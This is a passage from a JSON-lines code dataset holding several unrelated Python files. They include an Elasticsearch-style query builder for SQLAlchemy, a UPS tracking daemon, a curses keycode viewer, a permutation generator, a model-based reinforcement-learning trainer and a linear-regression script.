~~~~~~~~~~~~~~~~~~~~~~~~~\n    This extension allows you to use the ElasticSearch syntax for searching in SQLAlchemy.\n    It takes a query string and returns a SQLAlchemy query\n\n    Example query string:\n\n    {\n        \"filter\" : {\n            \"or\" : {\n                \"firstname\" : {\n                    \"equals\" : \"Jhon\"\n                },\n                \"lastname\" : \"Galt\",\n                \"uid\" : {\n                    \"like\" : \"111111\"\n                }\n            },\n            \"and\" : {\n                \"status\" : \"active\",\n                \"age\" : {\n                    \"gt\" : 18\n                }\n            }\n        },\n        \"sort\" : {\n            \"firstname\" : \"asc\",\n            \"age\" : \"desc\"\n        },\n        \"limit\": 5,\n        \"offset\": 2\n    }\n\n\"\"\"\n\nfrom flask import json\nfrom sqlalchemy import and_, or_, desc, asc\nfrom sqlalchemy.orm.properties import RelationshipProperty\nfrom sqlalchemy.sql.schema import Table\n\n\"\"\" Valid operators \"\"\"\nOPERATORS = {\n    \"like\": lambda f, a: f.like(a),\n    \"equals\": lambda f, a: f == a,\n    \"is_null\": lambda f, a=None: f.is_(None), # NULL tests need SQLAlchemy's is_(); 'f is None' is always False for a column\n    \"is_not_null\": lambda f, a=None: f.isnot(None),\n    \"gt\": lambda f, a: f > a,\n    \"gte\": lambda f, a: f >= a,\n    \"lt\": lambda f, a: f < a,\n    \"lte\": lambda f, a: f <= a,\n    \"in\": lambda f, a: f.in_(a),\n    \"not_in\": lambda f, a: ~f.in_(a),\n    \"not_equal_to\": lambda f, a: f != a,\n}\n\n\nclass OperatorNotFound(Exception):\n    pass\n\n\nclass ElasticQuery(object):\n    \"\"\" Magic method \"\"\"\n\n    def __init__(self, model, query, enabled_fields=None):\n        \"\"\" Initializer of the 'ElasticQuery' class \"\"\"\n        self.model = model\n        self.query = json.loads(query)\n        self.model_query = model.query\n        self.enabled_fields = enabled_fields\n\n    def search(self):\n        filters = self.query\n        result = self.model_query\n        keys = filters.keys()\n        count = 0\n        if \"filter\" in keys:\n            result = self.parse_filter(filters[\"filter\"])\n        if \"sort\" in keys:\n            result = result.order_by(*self.sort(filters[\"sort\"]))\n        count = result.count()\n        page = self.page(\n            result, filters.get(\"offset\", None), filters.get(\"limit\", None)\n        )\n\n        return result, count, page\n\n    def page(self, query, offset, limit):\n        def apply_page(query=query):\n            if offset:\n                query = query.offset(offset)\n            if limit:\n                query = query.limit(limit)\n            return query\n\n        return apply_page\n\n    def parse_filter(self, filters):\n        \"\"\" This method processes the filters \"\"\"\n        try:\n            for filter_type, filter_value in filters.items():\n                if filter_type == \"or\" or filter_type == \"and\":\n                    conditions = []\n                    
for field in filters[filter_type]:\n if self.is_field_allowed(field):\n conditions.append(\n self.create_query(\n self.parse_field(field, filter_value[field])\n )\n )\n if filter_type == \"or\":\n self.model_query = self.model_query.filter(or_(*conditions))\n elif filter_type == \"and\":\n self.model_query = self.model_query.filter(and_(*conditions))\n else:\n if self.is_field_allowed(filter_type):\n conditions = self.create_query(\n self.parse_field(filter_type, filter_value)\n )\n self.model_query = self.model_query.filter(conditions)\n except OperatorNotFound:\n return self.model_query\n return self.model_query\n\n def parse_field(self, field, field_value):\n \"\"\" Parse the operators and translate ES operators to SQLAlchemy operators \"\"\"\n if type(field_value) is dict:\n operator = list(field_value)[0]\n if self.verify_operator(operator) is False:\n raise OperatorNotFound()\n value = field_value[operator]\n elif type(field_value) is str:\n operator = u\"equals\"\n value = field_value\n else:\n raise OperatorNotFound()\n return field, operator, value\n\n @staticmethod\n def verify_operator(operator):\n \"\"\" Verify if the operator is valid \"\"\"\n try:\n if hasattr(OPERATORS[operator], \"__call__\"):\n return True\n else:\n return False\n except ValueError:\n return False\n except KeyError:\n return False\n\n def is_field_allowed(self, field):\n if self.enabled_fields:\n return field in self.enabled_fields\n else:\n return True\n\n def create_query(self, attr):\n \"\"\" Mix all values and make the query \"\"\"\n field = attr[0]\n operator = attr[1]\n value = attr[2]\n model = self.model\n\n if \".\" in field:\n field_items = field.split(\".\")\n\n attr = None\n for field_item in field_items:\n attr = getattr(model, field_item, None)\n if isinstance(attr.property, RelationshipProperty):\n model = attr.property.mapper.class_\n secondary = attr.property.secondary\n if isinstance(secondary, Table):\n self.model_query = self.model_query.join(secondary)\n self.model_query = self.model_query.join(model)\n else:\n break\n\n return OPERATORS[operator](attr, value)\n\n return OPERATORS[operator](getattr(model, field, None), value)\n\n def sort(self, sort):\n \"\"\" Sort \"\"\"\n order = []\n for field, direction in sort.items():\n if direction == \"asc\":\n order.append(asc(getattr(self.model, field, None)))\n elif direction == \"desc\":\n order.append(desc(getattr(self.model, field, None)))\n return order\n","sub_path":"openpatch_core/database/elastic_query.py","file_name":"elastic_query.py","file_ext":"py","file_size_in_byte":6231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"348857157","text":"from fooapp import FooApp, start_app\nfrom time import sleep\nfrom datetime import tzinfo\nfrom datetime import datetime\nfrom xml.etree import ElementTree\nfrom ncore.data import FileStore\nfrom ncore.daemon import become_daemon\nfrom ncore.rest import request\nimport logging\nimport sys\ntry:\n    import json\nexcept ImportError:\n    import simplejson as json\n\nclass UPS(FooApp):\n    name = 'ups'\n    config_opts = {}\n\n    def __init__(self, user):\n        FooApp.__init__(self, user)\n\n        try:\n            self.numbers = json.loads(self.data['numbers'])\n        except:\n            self.numbers = []\n\n        try:\n            self.cache = json.loads(self.data['cache'])\n        except:\n            self.cache = []\n\n    def send(self, msg):\n        if msg['text'] not in self.numbers:\n            self.numbers.append(msg['text'])\n            self.recv('Now tracking %s' % msg['text'])\n        else:\n            self.numbers.remove(msg['text'])\n            self.recv('Removed %s' % 
msg['text'])\n\n self.data['numbers'] = json.dumps(self.numbers)\n self.update()\n \n def run(self):\n while True:\n self.update()\n sleep(3600)\n \n def update(self):\n if len(self.numbers) == 0:\n return\n\n for num in self.numbers:\n # UPS access-request XML (tags restored; they had been stripped)\n body = '''<?xml version=\"1.0\"?>\n<AccessRequest xml:lang=\"en-US\">\n <AccessLicenseNumber>%s</AccessLicenseNumber>\n <UserId>%s</UserId>\n <Password>%s</Password>\n</AccessRequest>\n''' % (self.config['ups']['xmlkey'], self.config['ups']['username'], self.config['ups']['password'])\n body += '''<?xml version=\"1.0\"?>\n<TrackRequest xml:lang=\"en-US\">\n <Request>\n <TransactionReference>\n <CustomerContext>%s</CustomerContext>\n <XpciVersion>1.0</XpciVersion>\n </TransactionReference>\n <RequestAction>Track</RequestAction>\n <RequestOption>activity</RequestOption>\n </Request>\n <TrackingNumber>%s</TrackingNumber>\n</TrackRequest>\n''' % (num, num)\n \n body = body.encode('ascii')\n\n status, response = request('POST', 'https://wwwcie.ups.com/ups.app/xml/Track', body)\n\n #logging.debug(response)\n\n tree = ElementTree.fromstring(response)\n for status in tree.findall('Shipment/Package/Activity'):\n city = status.findtext('ActivityLocation/Address/City')\n state = status.findtext('ActivityLocation/Address/StateProvinceCode')\n dt = '%s:%s' % (status.findtext('Date'), status.findtext('Time'))\n dt = datetime.strptime(dt, '%Y%m%d:%H%M%S')\n desc = status.findtext('Status/StatusType/Description')\n msg = '%s %s: %s' % (dt.strftime('%a %d - %H:%M'), num, desc)\n if city and state:\n msg = '%s (%s, %s)' % (msg, city, state)\n if msg not in self.cache:\n self.recv(msg)\n self.cache.append(msg)\n self.data['cache'] = json.dumps(self.cache)\n\nif __name__ == '__main__':\n become_daemon()\n start_app(UPS, user=sys.argv[1])\n","sub_path":"ups.py","file_name":"ups.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"433423920","text":"#curses_keycode.py\nimport curses as crs\nfrom curses import panel\nimport os\nimport subprocess\nimport time\n\ndef main(stdscr):\n    #initiate\n    stdscr.addstr(\"press enter to quit\")\n    crs.curs_set(0)\n    stdscr = crs.initscr()\n\n    while True:\n        key = stdscr.getch()\n        if key == 10:\n            stdscr.clear()\n            stdscr.move(8, 12)\n            stdscr.addstr(\"you pressed key 10 'enter', quitting program\")\n            stdscr.getch()\n            break\n\n        #show the keycode and key\n        stdscr.clear() \n        stdscr.move(8, 12)\n        str_chr = \"The key code of '{}' is {}\". 
format(chr(key), str(key))\n stdscr.addstr(str_chr)\n\n crs.endwin()\n\ncrs.wrapper(main)\n","sub_path":"curses_keycode.py","file_name":"curses_keycode.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"343664366","text":"#import time\n\ndef func():\n\n f = input()\n\n b = []\n\n for i in range(0, int(f)):\n \n d, e = input().split(\" \")\n\n print (d, e)\n\n for num in b:\n print (num)\n\n#t1 = time.time()\nfunc()\n#t2 = time.time()\n#print (t2-t1)\n\n","sub_path":"Classical_problems/Problem_2/Problem_2.py","file_name":"Problem_2.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"105949037","text":"__author__ = 'Tom'\n\n#Generating Combinatorial objects\n\n#2.2 Permutations, p is a list\n#Arranged lexicographically\ndef next_permutation(p):\n k = len(p)-2\n while p[k] > p[k+1]:\n k -=1\n t = k\n c = p[k]\n while t < len(p)-1 and p[t+1] > c:\n t+=1\n p[k] = p[t]\n p[t] = c\n end = p[k+1:]\n end.reverse()\n answer = p[:k+1]\n answer.extend(end)\n return answer\n\n#assume p is sorted\ndef all_permutations(p):\n print(p)\n end = p[:]\n end.reverse()\n while p != end:\n p = next_permutation(p)\n print(p)\n\n\nall_permutations([0,1,2,3,4])\n\n","sub_path":"Chapter2.py","file_name":"Chapter2.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"22830842","text":"import json\nfrom pprint import pprint\nimport os\nimport numpy as np\nimport pandas as pd\nimport datetime\nimport sys\nfrom torch.distributions import Normal\n\nimport copy\nimport torch\nfrom src.reinforcement.goal_directed_model_based_rl.replay_buffer import ReplayBuffer\n\nimport matplotlib.pyplot as plt\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Helvetica'], 'size': 10})\n## for Palatino and other serif fonts use:\n#rc('font',**{'family':'serif','serif':['Palatino']})\nrc('text', usetex=True)\n\nclass Logger(object):\n def __init__(self, fname):\n self.terminal = sys.stdout\n self.log_name = fname\n self.log = open(fname, \"a\")\n\n def write(self, message):\n self.terminal.write(message)\n self.log.write(message)\n\n def flush(self):\n #this flush method is needed for python 3 compatibility.\n #this handles the flush command by doing nothing.\n #you might want to specify some extra behavior here.\n self.log.close()\n self.log = open(self.log_name, \"a\")\n pass\n\n\n# Taken from https://github.com/openai/baselines/blob/master/baselines/ddpg/noise.py, which is\n# based on http://math.stackexchange.com/questions/1287634/implementing-ornstein-uhlenbeck-in-matlab\nclass OrnsteinUhlenbeckActionNoise:\n def __init__(self, mu, sigma=0.003, theta=.15, dt=1e-2, x0=None):\n self.theta = theta\n self.mu = mu\n self.sigma = sigma\n self.dt = dt\n self.x0 = x0\n self.reset()\n\n def __call__(self):\n x = self.x_prev + self.theta * (self.mu - self.x_prev) * self.dt + \\\n self.sigma * np.sqrt(self.dt) * np.random.normal(size=self.mu.shape)\n self.x_prev = x\n return x\n\n def reset(self):\n self.x_prev = self.x0 if self.x0 is not None else np.zeros_like(self.mu)\n\n def __repr__(self):\n return 'OrnsteinUhlenbeckActionNoise(mu={}, sigma={})'.format(self.mu, self.sigma)\n\n\nclass ModelBasedMultiStepBackPropWithEnsembleClassifierV3:\n def __init__(self, agent=None, model_dynamics=None, **kwargs):\n self.agent = agent\n\n 
self.actor_optim = torch.optim.Adam(agent.parameters(), lr=kwargs['actor_lr'], eps=kwargs['learning_rate_eps'])\n # self.actor_optim = torch.optim.SGD(agent.parameters(), lr=kwargs['actor_lr'])\n\n self.num_epochs_actor = kwargs['num_epochs_actor']\n self.num_epochs_critic = kwargs['num_epochs_critic']\n self.minibatch_size = kwargs['minibatch_size']\n self.clip_grad = kwargs['clip_grad']\n self.device = kwargs['device']\n self.num_rollouts_per_update = kwargs['rollouts_per_update']\n\n self.model_dynamics = model_dynamics\n self.model_dynamics_optim = torch.optim.Adam(self.model_dynamics.parameters(), lr=kwargs['model_dynamics_lr'], eps=kwargs['learning_rate_eps'])\n self.num_epochs_model_dynamics = kwargs['num_epochs_model_dynamics']\n self.num_virtual_rollouts_per_update = kwargs['virtual_rollouts_per_update']\n\n self.replay_buffer = ReplayBuffer(kwargs['buffer_size'])\n self.buffer_trajectories = kwargs['buffer_trajectories']\n self.videos_dir = kwargs['videos_dir']\n self.noise_gamma = 1.0\n self.noise_decay = kwargs['noise_decay']\n\n self.action_penalty = kwargs['action_penalty']\n\n self.cdf_beta = kwargs['cdf_beta']\n\n def train(self, env, num_episodes, dir=None):\n \"\"\"\n Train the agent to solve the environment\n :param env: environment object (ReacherEnvironment)\n :param num_episodes: number of episodes (int)\n :return scores: list of scores for each episode (list)\n \"\"\"\n\n action_noise = OrnsteinUhlenbeckActionNoise(mu=np.zeros(env.action_dim), sigma=0.05)\n scores = []\n train_step_i = 0\n\n dt = str(datetime.datetime.now().strftime(\"%m_%d_%Y_%I_%M_%p\"))\n # writer = tf.summary.FileWriter(settings['summary_dir'] + '/summary_md_' + dt, sess.graph)\n video_dir = self.videos_dir + '/video_ensemble_multi_step_V3_' + dt\n if dir is not None:\n video_dir = dir\n try:\n os.makedirs(video_dir)\n except:\n print(\"directory '{}' already exists\".format(video_dir))\n\n sys.stdout = Logger(video_dir + \"/log.txt\")\n\n for episode in range(num_episodes):\n ep_states = []\n ep_states_pred = []\n ep_actions = []\n misses = []\n # rollout\n T = len(env.get_current_reference())\n states = np.zeros((T, env.state_dim))\n actions = np.zeros((T, env.action_dim))\n next_states = np.zeros((T, env.state_dim))\n dones = np.zeros(T)\n\n\n state0 = env.reset()\n state = state0\n env.render()\n ep_states.append(state)\n ep_states_pred.append(state[:-env.goal_dim])\n state = env.normalize(state, env.state_bound)\n\n # axes[0].cla()\n\n score = 0.\n\n self.agent.eval()\n self.model_dynamics.eval()\n step = 0\n miss_max_idx = -1\n terminated = False\n\n probs = []\n entropies = []\n\n reference_probs = []\n reference_entropies = []\n reference_classify_hidden = None\n\n while True:\n state_tensor = torch.from_numpy(state).float().to(self.device).view(1, -1)\n action = self.agent(state_tensor).detach().cpu().numpy().squeeze()\n action = action + self.noise_gamma * action_noise()\n ep_actions.append(action)\n action_denorm = env.denormalize(action, env.action_bound)\n next_state, reward, done, _ = env.step(action_denorm)\n\n # reference classify\n sound_ref = env.get_current_reference()[step, -env.audio_dim:]\n ref_prob, ref_entropy, reference_classify_hidden = env.classify(torch.from_numpy(sound_ref).float().to(self.device).view(1,1,-1), reference_classify_hidden)\n reference_probs.append(ref_prob.detach().cpu().numpy())\n reference_entropies.append(ref_entropy.detach().cpu().numpy())\n\n if isinstance(reward, float):\n probs.append(0)\n entropies.append(0)\n else:\n probs.append(reward[0].detach().cpu().numpy())\n 
entropies.append(reward[1].detach().cpu().numpy())\n\n next_state_pred, next_state_pred_std, _ = self.model_dynamics(state_tensor, torch.from_numpy(action).float().to(self.device).view(1,-1))\n next_state_pred = env.denormalize(next_state_pred.detach().cpu().numpy().squeeze(), env.state_bound[:-env.goal_dim])\n\n ep_states.append(next_state)\n ep_states_pred.append(next_state_pred)\n next_state = env.normalize(next_state, env.state_bound)\n\n states[step, :] = state\n actions[step, :] = action\n next_states[step, :] = next_state\n dones[step] = 1\n\n env.render()\n\n miss = torch.abs(torch.from_numpy(next_state).float().to(self.device)[:-env.goal_dim][torch.from_numpy(np.array(env.state_goal_mask, dtype=np.uint8)).byte()] -\n torch.from_numpy(state).float().to(self.device)[-env.goal_dim:])\n\n misses.append(miss[:].max().detach().cpu().numpy())\n\n if len(misses) > 3 and np.all(np.array(misses[-3:]) > 0.1) and not terminated:\n terminated = True\n res_step = step\n miss_max_idx = np.argmax(miss[:].detach().cpu().numpy())\n elif not terminated:\n score = step\n if len(misses) > 3 and np.all(np.array(misses[-3:]) > 0.1) and (episode % 10 != 0 or self.replay_buffer.size() * 3 < 2 * self.minibatch_size):\n miss_max_idx = np.argmax(miss[:].detach().cpu().numpy())\n break\n if np.any(done):\n\n break\n state = next_state\n step += 1\n\n\n\n\n if episode % 10 != 0:\n self.replay_buffer.add((states, actions, next_states, dones))\n\n scores.append(score)\n if not terminated:\n res_step = step\n if episode % 10 == 0:\n self.noise_gamma *= self.noise_decay\n\n if episode % 10 == 0 and episode > 1 and self.replay_buffer.size() * 3 > 2 * self.minibatch_size:\n n_audio = 26\n n_artic = 24\n n_artic_goal = 6\n\n # show fully predicted rollout given s0 and list of actions\n pred_states = []\n pred_states_std = []\n state = state0\n state_std = np.zeros(env.state_dim - env.goal_dim)\n pred_states_probs = []\n pred_state_prob = 1.\n for idx, a in enumerate(ep_actions):\n state = env.normalize(state, env.state_bound)\n\n pred_states.append(state)\n pred_states_std.append(state_std)\n state_tensor = torch.from_numpy(state).float().to(self.device).view(1, -1)\n next_state_pred, next_state_pred_std, _ = self.model_dynamics(state_tensor,\n torch.from_numpy(a).float().to(self.device).view(1, -1))\n\n next_state_distr = Normal(next_state_pred, next_state_pred_std)\n next_state_sampled_prob = (next_state_distr.cdf(next_state_pred + self.cdf_beta) - next_state_distr.cdf(\n next_state_pred - self.cdf_beta)).prod(dim=-1).detach().cpu().numpy().squeeze()\n pred_state_prob *= next_state_sampled_prob\n pred_states_probs.append(pred_state_prob)\n\n next_state_pred = env.denormalize(next_state_pred.detach().cpu().numpy().squeeze(),\n env.state_bound[:-env.goal_dim])\n state = np.concatenate((next_state_pred, ep_states[idx][-env.goal_dim:]))\n state_std = next_state_pred_std.detach().cpu().numpy().squeeze()\n\n\n\n\n\n # Share a X axis with each column of subplots\n fig, axes = plt.subplots(9, 2, figsize=(5, 17))\n cb = None\n # plt.ion()\n # plt.show()\n\n\n\n ep_states = env.normalize(np.array(ep_states), env.state_bound)\n im0 = axes[0, 0].imshow(np.array(ep_states)[:, :n_artic].T, vmin=-1., vmax=1.)\n axes[0, 0].set_title('rollout artic')\n plt.colorbar(im0, ax=axes[0, 0])\n\n im0 = axes[0, 1].imshow(np.array(ep_states)[:, n_artic: n_artic+n_audio].T, vmin=-1., vmax=1.)\n axes[0, 1].set_title('rollout acoustic')\n plt.colorbar(im0, ax=axes[0, 1])\n # im_pred = axes[1].imshow(np.array(ep_states_pred)[:, -n_audio:].T, 
vmin=vmin, vmax=vmax)\n\n im_pred = axes[1, 0].imshow(np.array(pred_states)[:, :n_artic].T, vmin=-1., vmax=1.)\n axes[1, 0].set_title('pred rollout artic')\n plt.colorbar(im_pred, ax=axes[1, 0])\n\n im_pred = axes[1, 1].imshow(np.array(pred_states)[:, n_artic: n_artic+n_audio].T, vmin=-1., vmax=1.)\n axes[1, 1].set_title('pred rollout acoustic')\n plt.colorbar(im_pred, ax=axes[1, 1])\n\n im_pred = axes[2, 0].imshow(np.array(pred_states_std)[:, :n_artic].T)\n axes[2, 0].set_title('pred rollout artic std')\n plt.colorbar(im_pred, ax=axes[2, 0])\n\n im_pred = axes[2, 1].imshow(np.array(pred_states_std)[:, n_artic: n_artic+n_audio].T)\n axes[2, 1].set_title('pred rollout acoustic std')\n plt.colorbar(im_pred, ax=axes[2, 1])\n\n if n_artic_goal > 0:\n im1 = axes[3, 0].imshow(ep_states[:, -env.goal_dim: -env.goal_dim + n_artic_goal].T, vmin=-1., vmax=1.)\n axes[3, 0].set_title('reference artic')\n plt.colorbar(im1, ax=axes[3, 0])\n\n im1 = axes[3, 1].imshow(ep_states[:, -env.goal_dim + n_artic_goal:].T, vmin=-1., vmax=1.)\n axes[3, 1].set_title('reference acoustic')\n plt.colorbar(im1, ax=axes[3, 1])\n\n diff_img = np.abs(np.array([ep_states[i, -env.goal_dim:] - np.array(ep_states)[i + 1, :-env.goal_dim][env.state_goal_mask] for i in range(len(ep_states)-1)]))\n # diff_img_normed = env.normalize(diff_img.T, env.state_bound[:-env.goal_dim])\n diff_img_normed = diff_img\n\n if n_artic_goal > 0:\n im2 = axes[4, 0].imshow(np.array(diff_img_normed[:, :n_artic_goal].T))\n axes[4, 0].set_title('error artic')\n plt.colorbar(im2, ax=axes[4, 0])\n\n im2 = axes[4, 1].imshow(np.array(diff_img_normed[:, -n_audio:].T))\n axes[4, 1].set_title('error acoustic')\n plt.colorbar(im2, ax=axes[4, 1])\n\n pred_err_img = np.abs(np.array(\n [ep_states[i, :-env.goal_dim] - np.array(pred_states)[i, :-env.goal_dim] for i in\n range(len(ep_states) - 1)]))\n # diff_img_normed = env.normalize(diff_img.T, env.state_bound[:-env.goal_dim])\n im3 = axes[5, 0].imshow(np.array(pred_err_img[:, :n_artic].T))\n axes[5, 0].set_title('pred error artic')\n plt.colorbar(im3, ax=axes[5, 0])\n\n im3 = axes[5, 1].imshow(np.array(pred_err_img[:, n_artic:n_artic + n_audio].T))\n axes[5, 1].set_title('pred error acoustic')\n plt.colorbar(im3, ax=axes[5, 1])\n\n im4 = axes[6, 0].imshow(np.array(probs).T, vmin=0., vmax=np.array(probs).T.max())\n # axes[5, 1].ylim((0, 1.0))\n axes[6, 0].set_title('classify prob')\n plt.colorbar(im4, ax=axes[6, 0])\n\n im4 = axes[6, 1].plot(np.array(entropies))\n axes[6, 1].set_ylim(bottom=0, top=np.array(entropies).max()+2)\n axes[6, 1].set_title('classify entropy')\n # plt.colorbar(im4, ax=axes[4, 1])\n\n axes[7, 1].plot(np.array(pred_states_probs))\n axes[7, 1].set_ylim(bottom=0, top=1.2)\n axes[7, 1].set_title('pred state probability')\n\n im = axes[8, 0].imshow(np.array(reference_probs).T, vmin=0., vmax=np.array(reference_probs).T.max())\n # axes[5, 1].ylim((0, 1.0))\n axes[8, 0].set_title('classify ref prob')\n plt.colorbar(im, ax=axes[8, 0])\n\n im = axes[8, 1].plot(np.array(reference_entropies).T)\n axes[8, 1].set_ylim(bottom=0, top=np.array(reference_entropies).max()+2)\n # axes[5, 1].ylim((0, 1.0))\n axes[8, 1].set_title('classify ref entropy')\n\n\n\n # if cb is None:\n # cb = plt.colorbar(im0, ax=axes[0, 1])\n # plt.colorbar(im_pred, ax=axes[1, 1])\n # plt.colorbar(im1, ax=axes[2, 1])\n # plt.colorbar(im2, ax=axes[3, 1])\n # plt.colorbar(im3, ax=axes[4, 1])\n plt.tight_layout()\n # plt.draw()\n # plt.pause(.001)\n\n fname = video_dir + '/episode_' + 
str(episode) + '_' + str(datetime.datetime.now().strftime(\"%m_%d_%Y_%I_%M_%p_%S\"))\n env.dump_episode(fname)\n fig.savefig(fname+\".png\")\n plt.close('all')\n\n sys.stdout.flush()\n\n # save model\n if episode % 50 == 0:\n with open(video_dir + '/model_dynamics.pickle', 'wb') as f:\n torch.save(self.model_dynamics, f)\n with open(video_dir + '/agent.pickle', 'wb') as f:\n torch.save(self.agent, f)\n\n if self.replay_buffer.size() * 3 > 2 * self.minibatch_size:\n # train nets couple of times relative to the increase of replay buffer\n\n ##############################################################\n # train model dynamics\n ##############################################################\n\n\n s0_batch, a_batch, s1_batch, dones_batch = self.replay_buffer.sample_batch(self.replay_buffer.size())\n\n state_mask = dones_batch.repeat(s0_batch.shape[-1], 1, 1).permute(1, 2, 0).byte()\n action_mask = dones_batch.repeat(a_batch.shape[-1], 1, 1).permute(1, 2, 0).byte()\n\n s0_batch_masked = s0_batch.masked_select(state_mask).view(-1, env.state_dim)\n a_batch_masked = a_batch.masked_select(action_mask).view(-1, env.action_dim)\n s1_batch_masked = s1_batch.masked_select(state_mask).view(-1, env.state_dim)\n\n md_replay_buffer = ReplayBuffer(self.replay_buffer.size() * 30)\n\n [md_replay_buffer.add((s0_batch_masked[i].detach().cpu().numpy(),\n a_batch_masked[i].detach().cpu().numpy(),\n s1_batch_masked[i].detach().cpu().numpy())) for i in range(s0_batch_masked.shape[0])]\n\n n_train_steps = round(\n md_replay_buffer.size() / self.minibatch_size * self.num_epochs_model_dynamics + 1)\n\n self.model_dynamics.train()\n for _ in range(n_train_steps):\n train_step_i += 1\n s0_batch, a_batch, s1_batch = md_replay_buffer.sample_batch(self.minibatch_size)\n\n self.model_dynamics_optim.zero_grad()\n s1_pred, _, s1_pred_ensemble = self.model_dynamics(s0_batch.float().to(self.device), a_batch.float().to(self.device))\n md_loss = torch.nn.SmoothL1Loss(reduce=False)(s1_pred_ensemble,\n s1_batch[:, :-env.goal_dim].float().to(self.device).repeat(s1_pred_ensemble.shape[0], 1, 1))\n md_loss = md_loss.sum() / s0_batch.shape[0]\n\n md_loss.backward()\n torch.nn.utils.clip_grad_norm_(self.model_dynamics.parameters(), self.clip_grad)\n self.model_dynamics_optim.step()\n\n ##############################################################\n # train policy\n ##############################################################\n\n self.model_dynamics.eval()\n\n s0_batch, a_batch, s1_batch, dones_batch = self.replay_buffer.sample_batch(self.replay_buffer.size())\n\n # calculate probabilities of trajectories\n next_state_pred, next_state_pred_std, _ = self.model_dynamics(s0_batch.view(-1, env.state_dim).float(),\n a_batch.view(-1, env.action_dim).float())\n next_state_dist = Normal(next_state_pred, next_state_pred_std)\n next_state_prob = (next_state_dist.cdf(s1_batch.float().view(-1, env.state_dim)[:, :-env.goal_dim] + self.cdf_beta)\n - next_state_dist.cdf(s1_batch.float().view(-1, env.state_dim)[:, :-env.goal_dim] - self.cdf_beta)).prod(dim=-1)\n\n # compute cum prod of trajectory probability\n next_state_prob = next_state_prob.view(s0_batch.shape[0], -1).cumprod(dim=-1)\n\n state_mask = dones_batch.repeat(s0_batch.shape[-1], 1, 1).permute(1, 2, 0).byte()\n action_mask = dones_batch.repeat(a_batch.shape[-1], 1, 1).permute(1, 2, 0).byte()\n\n s0_batch_masked = s0_batch.masked_select(state_mask).view(-1, env.state_dim)\n a_batch_masked = a_batch.masked_select(action_mask).view(-1, env.action_dim)\n s1_batch_masked = 
s1_batch.masked_select(state_mask).view(-1, env.state_dim)\n s0_prob = torch.cat((torch.ones(s0_batch.shape[0], 1), next_state_prob[:, :-1]), dim=-1)\n s0_prob_masked = s0_prob.masked_select(dones_batch.byte())\n\n agent_replay_buffer = ReplayBuffer(self.replay_buffer.size() * 30)\n\n [agent_replay_buffer.add((s0_batch_masked[i].detach().cpu().numpy(),\n a_batch_masked[i].detach().cpu().numpy(),\n s1_batch_masked[i].detach().cpu().numpy(),\n s0_prob_masked[i].detach().cpu().numpy())) for i in range(s0_batch_masked.shape[0])]\n\n s1_pred_log_probs = []\n self.agent.train()\n self.model_dynamics.eval()\n for _ in range(n_train_steps):\n # train_step_i += 1\n\n s0_batch, a_batch, s1_batch, s0_prob_batch = agent_replay_buffer.sample_batch(self.minibatch_size)\n\n s0_batch = s0_batch.detach()\n s0_prob_batch = s0_prob_batch.detach()\n\n actions_predicted = self.agent(s0_batch.float().to(self.device))\n # predict state if predicted actions will be applied\n s1_pred, s1_pred_std, s1_pred_ensmble = self.model_dynamics(s0_batch.float().to(self.device), actions_predicted)\n # s1_pred = s1_pred_ensmble[0,:,:]\n actor_loss = torch.nn.MSELoss(reduction='none')(\n s1_pred[:, torch.from_numpy(np.array(env.state_goal_mask, dtype=np.uint8)).byte()],\n s0_batch[:, -env.goal_dim:].float().to(self.device))\n\n # s1_pred_log_prob = Normal(s1_pred, s1_pred_std).log_prob(s1_pred).sum(dim=-1).exp()\n\n s1_pred_prob = (Normal(s1_pred, s1_pred_std).cdf(s1_pred + self.cdf_beta) - Normal(s1_pred, s1_pred_std).cdf(s1_pred - self.cdf_beta)).prod(dim=-1)\n s1_pred_prob = s1_pred_prob * s0_prob_batch\n # s1_pred_prob = s1_pred_prob\n\n s1_pred_log_probs.append(s1_pred_prob.detach().cpu().numpy().squeeze())\n actor_loss = actor_loss * s1_pred_prob.detach().unsqueeze(1)\n actor_loss = actor_loss.sum() / self.minibatch_size\n if torch.isnan(actor_loss):\n k = 7\n actor_loss = actor_loss\n # study this penalty\n action_penalty = self.action_penalty * torch.mean(torch.abs(actions_predicted))\n # actor_loss += action_penalty\n self.actor_optim.zero_grad()\n actor_loss.backward()\n torch.nn.utils.clip_grad_norm_(self.agent.parameters(), self.clip_grad)\n self.actor_optim.step()\n\n print(\"|episode: {}| train step: {}| model_dynamics loss: {:.8f}| policy loss: {:.5f}| score:{:.2f} | steps {}| miss_max_idx {} | md_prob_mean {:.2f}\".format(episode,\n train_step_i,\n np.mean(md_loss.detach().cpu().numpy()),\n actor_loss.detach().cpu().numpy().squeeze(),\n score,\n res_step,\n miss_max_idx,\n np.mean(np.array(s1_pred_log_probs))))\n\n print(\"Training finished. 
Result score: \", score)\n return scores","sub_path":"src/reinforcement/goal_directed_model_based_rl/algs/model_based_multi_step_backprop_with_ensemble_classifier_v3.py","file_name":"model_based_multi_step_backprop_with_ensemble_classifier_v3.py","file_ext":"py","file_size_in_byte":24416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"653281705","text":"from sklearn import datasets\nfrom sklearn.model_selection import train_test_split # hold-out method\nfrom sklearn.metrics import mean_squared_error # mean squared error\nfrom sklearn.metrics import r2_score # R square\nfrom sklearn.linear_model import LinearRegression\nimport lr\n\ndiabetes = datasets.load_diabetes()\nprint(\"Total number of rows: \" + str(len(diabetes.data)))\nprint(\"Number of features: \" + str(diabetes.data.shape[1]))\nX = diabetes['data']\nY = diabetes['target'].reshape(-1, 1)\n\nx_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=0.2)\nmodel = lr.LinearRegression(x_train, y_train, 0) # regularization coefficient set to 0\n\nmodel.gradient_descent_fit() # perform the fit\ny_pre = model.predict(x_test)\n\nprint(\"-- my own implementation --\")\nprint(\"MSE 